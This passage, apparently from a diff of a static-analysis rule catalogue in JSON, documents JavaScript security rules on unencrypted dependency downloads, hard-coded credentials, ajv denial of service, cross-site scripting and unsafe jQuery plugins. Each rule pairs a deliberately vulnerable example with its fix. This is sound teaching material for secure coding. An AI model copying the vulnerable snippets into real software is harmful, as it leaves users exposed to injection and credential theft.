](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", + "markdown" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! 
](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-300", "external/cwe/cwe-319", "external/cwe/cwe-494", "external/cwe/cwe-829" ], + "description" : "Using unencrypted protocols to fetch dependencies can leave an application\n open to man-in-the-middle attacks.", + "id" : "js/insecure-dependency", + "kind" : "problem", + "name" : "Dependency download using unencrypted communication channel", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "8.1" + } + }, { + "id" : "js/hardcoded-credentials", + "name" : "js/hardcoded-credentials", + "shortDescription" : { + "text" : "Hard-coded credentials" + }, + "fullDescription" : { + "text" : "Hard-coding credentials in source code may enable an attacker to gain unauthorized access." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. 
For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst 
pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", + "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. 
If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded 
password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-259", "external/cwe/cwe-321", "external/cwe/cwe-798" ], + "description" : "Hard-coding credentials in source code may enable an attacker\n to gain unauthorized access.", + "id" : "js/hardcoded-credentials", + "kind" : "path-problem", + "name" : "Hard-coded credentials", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.8" + } + }, { + "id" : "js/resource-exhaustion-from-deep-object-traversal", + "name" : "js/resource-exhaustion-from-deep-object-traversal", + "shortDescription" : { + "text" : "Resources exhaustion from deep object traversal" + }, + "fullDescription" : { + "text" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. 
This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Resources exhaustion from deep object traversal\nProcessing user-controlled data with a method that allocates excessive amounts of memory can lead to denial of service.\n\nIf the JSON schema validation library `ajv` is configured with `allErrors: true` there is no limit to how many error objects will be allocated. 
An attacker can exploit this by sending an object that deliberately contains a huge number of errors, and in some cases, with longer and longer error messages. This can cause the service to become unresponsive due to the slow error-checking process.\n\n\n## Recommendation\nDo not use `allErrors: true` in production.\n\n\n## Example\nIn the example below, the user-submitted object `req.body` is validated using `ajv` and `allErrors: true`:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: true });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\nAlthough this ensures that `req.body` conforms to the schema, the validation itself could be vulnerable to a denial-of-service attack. An attacker could send an object containing so many errors that the server runs out of memory.\n\nA solution is to not pass in `allErrors: true`, which means `ajv` will only report the first error, not all of them:\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet ajv = new Ajv({ allErrors: process.env['REST_DEBUG'] });\najv.addSchema(require('./input-schema'), 'input');\n\nvar app = express();\napp.get('/user/:id', function(req, res) {\n\tif (!ajv.validate('input', req.body)) {\n\t\tres.end(ajv.errorsText());\n\t\treturn;\n\t}\n\t// ...\n});\n\n```\n\n## References\n* Ajv documentation: [security considerations](https://github.com/ajv-validator/ajv/blob/master/docs/security.md#untrusted-schemas)\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-400" ], + "description" : "Processing user-controlled object hierarchies inefficiently can lead to denial of service.", + "id" : 
"js/resource-exhaustion-from-deep-object-traversal", + "kind" : "path-problem", + "name" : "Resources exhaustion from deep object traversal", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/xss-through-dom", + "name" : "js/xss-through-dom", + "shortDescription" : { + "text" : "DOM text reinterpreted as HTML" + }, + "fullDescription" : { + "text" : "Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. 
In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. 
Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. 
The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Reinterpreting text from the DOM as HTML\n can lead to a cross-site scripting vulnerability.", + "id" : "js/xss-through-dom", + "kind" : "path-problem", + "name" : "DOM text reinterpreted as HTML", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/xss-through-exception", + "name" : "js/xss-through-exception", + "shortDescription" : { + "text" : "Exception text reinterpreted as HTML" + }, + "fullDescription" : { + "text" : "Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. 
For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n \n try {\n var parsed = unknownParseFunction(deflt); \n } catch(e) {\n document.write(\"Had an error: \" + e + \".\");\n }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly 
back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n if (!ajv.validate('pollData', req.body)) {\n res.send(ajv.errorsText());\n }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'': 'foo'}` will generate the error `data/ should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Reinterpreting text from an exception as HTML\n can lead to a cross-site scripting vulnerability.", + "id" : "js/xss-through-exception", + "kind" : "path-problem", + "name" : "Exception text reinterpreted as HTML", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/unsafe-jquery-plugin", + "name" : "js/unsafe-jquery-plugin", + "shortDescription" : { + "text" : "Unsafe jQuery plugin" + }, + "fullDescription" : { + "text" : "A jQuery plugin that unintentionally constructs HTML from some of its 
options may be unsafe to use for clients." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. 
The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe jQuery plugin\nLibrary plugins, such as those for the jQuery library, are often configurable through options provided by the clients of the plugin. 
Clients, however, do not know the implementation details of the plugin, so it is important to document the capabilities of each option. The documentation for the plugin options that the client is responsible for sanitizing is of particular importance. Otherwise, the plugin may write user input (for example, a URL query parameter) to a web page without properly sanitizing it first, which allows for a cross-site scripting vulnerability in the client application through dynamic HTML construction.\n\n\n## Recommendation\nDocument all options that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example shows a jQuery plugin that selects a DOM element, and copies its text content to another DOM element. The selection is performed by using the plugin option `sourceSelector` as a CSS selector.\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// BAD may evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\nThis is, however, not a safe plugin, since the call to `jQuery` interprets `sourceSelector` as HTML if it is a string that starts with `<`.\n\nInstead of documenting that the client is responsible for sanitizing `sourceSelector`, the plugin can use `jQuery.find` to always interpret `sourceSelector` as a CSS selector:\n\n\n```javascript\njQuery.fn.copyText = function(options) {\n\t// GOOD may not evaluate `options.sourceSelector` as HTML\n\tvar source = jQuery.find(options.sourceSelector),\n\t text = source.text();\n\tjQuery(this).text(text);\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP 
[DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* jQuery: [Plugin creation](https://learn.jquery.com/plugins/basic-plugin-creation/).\n* Bootstrap: [XSS vulnerable bootstrap plugins](https://github.com/twbs/bootstrap/pull/27047).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "frameworks/jquery" ], + "description" : "A jQuery plugin that unintentionally constructs HTML from some of its options may be unsafe to use for clients.", + "id" : "js/unsafe-jquery-plugin", + "kind" : "path-problem", + "name" : "Unsafe jQuery plugin", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/xss", + "name" : "js/xss", + "shortDescription" : { + "text" : "Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to the DOM allows for a cross-site scripting vulnerability." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *DOM-based* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows part of the page URL being written directly to the document, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n var href = document.location.href,\n deflt = href.substring(href.indexOf(\"default=\")+8);\n document.write(\"\");\n document.write(\"\");\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\nDirectly writing user input (for example, a URL query parameter) to a webpage without properly sanitizing the input first, allows for a 
